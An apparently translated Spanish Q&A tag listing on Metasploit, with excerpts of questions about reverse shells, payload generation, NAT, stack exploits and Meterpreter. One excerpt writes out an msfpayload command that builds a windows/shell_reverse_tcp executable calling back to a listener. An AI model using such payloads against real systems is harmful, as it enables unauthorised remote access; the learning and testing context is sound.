Preguntas con etiqueta 'metasploit'

2
respuestas

Metasploit Obtener Shell a través de NAT

Ok, en primer lugar, esto es legal y lo tengo por escrito. Mi amigo y yo nos atacamos para mejorar y no violar la ley. Configuración Tengo una imagen de VMWare ejecutando BT5R3. Utiliza el NAT de VMWare, entonces mi red está detrás de un en...
hecha 16.07.2013 - 14:54
2
respuestas

Buen ejemplo de explotaciones de pila en Linux

Estoy haciendo una demostración de ataques de corrupción de memoria, y me gustaría mostrar algunos ejemplos de explotaciones que presentan corrupción de la pila (como uso después de libre). Mis requisitos son: Un exploit en funcionamiento (r...
hecha 20.12.2016 - 08:52
1
respuesta

Metasploit reverse_http (s) PAYLOAD para linux target

Durante la explotación a través de browzer_autopwn de metasploit, necesito configurar una carga útil utilizando el canal http o https en un destino de Linux. Pero no hay Reverse_http (s) disponibles en la categoría de carga útil de Linux. ¿Q...
hecha 23.06.2015 - 12:56
4
respuestas

windows / shell_reverse_tcp exploit no funciona si la escucha aún no se está ejecutando

Estoy usando Metasploit para generar un exploit shell_reverse_tcp usando el siguiente comando: msfpayload windows/shell_reverse_tcp LHOST=192.168.1.171 x > exploit.exe En el lado del oyente estoy usando netcat. Todo es perfecto y si e...
hecha 23.02.2016 - 11:10
1
respuesta

Sintaxis de ASM PE de 64 bits de la plantilla EXE personalizada

Lo pregunté anteriormente y luego lo eliminé, ya que creo que hice la pregunta sin orientarla hacia msfvenom y las plantillas EXE personalizadas. Hay un Windows PE de 64 bits escrito en ensamblador que se envía con Metasploit que estoy tratan...
hecha 17.01.2018 - 05:05
2
respuestas

¿Hay algún inconveniente en declarar siempre algunos caracteres erróneos predeterminados al generar exploits?

Al configurar los caracteres incorrectos para el código de shell, ¿hay algún inconveniente al suponer que debe marcar \ x00 y \ x0a como incorrectos?     
hecha 31.01.2016 - 09:28
3
respuestas

¿Podemos hackear con nuestra propia computadora?

Recientemente he ganado interés en Kali, especialmente en marcos como Metasploit. Supongamos que solo tengo una computadora que no tiene acceso a Internet. Quiero aprender a usar herramientas y marcos en Kali como Metasploit. He encontrado mucho...
hecha 18.03.2017 - 15:04
4
respuestas

Automatizando los ataques Metasploit, ¿es posible generar todos los módulos (la mayoría)?

Trabajo en la creación de firmas para todos los módulos de metasploit. Necesito estimular casi todos los ataques (exploits) en metasploit sin realmente apuntar a una víctima real (no creo que autopwn pueda ayudar aquí). La mayoría de los módu...
hecha 20.05.2012 - 10:23
2
respuestas

¿Cómo se ejecutan las cargas arbitrarias en la máquina remota?

Entiendo que ejecutar algo como un enlace TCP inverso a través de shell se basa en los recursos disponibles en la máquina víctima ... y en el caso de ejecutar un, digamos, el script Ruby desde la línea de comandos se interpretará hasta código de...
hecha 10.12.2013 - 00:58
2
respuestas

¿El shell de Meterpreter y el shell del sistema definen?

¿Cuál es la diferencia entre el shell Meterpreter y el shell del sistema? Por ejemplo, si encontré alguna vulnerabilidad en un sistema que permitiera ambos shells, ¿a qué debería recurrir, shell del sistema o Meterpreter ? ¿Qué tipo de co...
hecha 30.06.2018 - 07:05